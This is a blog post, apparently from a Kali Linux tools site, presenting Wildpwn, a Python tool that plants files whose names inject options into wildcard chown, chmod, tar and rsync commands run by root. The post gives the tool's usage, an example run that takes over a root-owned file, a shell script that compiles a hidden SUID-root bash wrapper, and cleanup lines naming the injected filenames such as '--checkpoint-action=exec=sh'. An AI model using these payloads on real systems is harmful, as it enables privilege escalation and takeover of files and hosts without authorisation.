Categories: Kali Linux

Wildpwn – Tool Used For Unix Wildcard Attacks

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks. It’s considered a fairly old-skool attack vector, but it still works quite often.

Wildpwn Usage

It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

Also ReadSVScanner – Scanner Vulnerability And MaSsive Exploit

Example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash Scripts Used On tar/rsync Attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c

Credit: Leon Juranic

R K

Next HashPump - Tool To Exploit Hash Length Extension Attack In Various Hashing Algorithms »

Previous « BurpSuite Extension Ruby : Template to speed up building a Burp Extension using Ruby

Published by

R K

Tags: unixWildcard AttacksWildpwn

8 years ago

How to Install Nginx on Ubuntu 26.04

Nginx continues to dominate the modern web hosting world because of its speed, reliability, and…

41 minutes ago

How To

PHP Ubuntu 26.04 Installation Guide for Apache and Nginx

Setting up PHP Ubuntu 26.04 is essential for developers who want to run modern web…

4 hours ago

How To

Apache on Ubuntu 26.04 Installation Guide for Beginners

Setting up Apache Ubuntu 26.04 is one of the fastest ways to launch a reliable…

7 hours ago

How To

How to Configure Static IP on Ubuntu Settings Easily

Setting up a Static IP on Ubuntu configuration is essential for servers, remote access systems,…

22 hours ago

How To

How to Change Ubuntu Timezone Using Terminal or GUI

Keeping the correct system clock is important for servers, desktop systems, scheduled tasks, and application…

1 day ago

How To

How to Perform Ubuntu Hostname Change Without Rebooting

An Ubuntu Hostname Change is a common administrative task used to rename Linux servers, desktops,…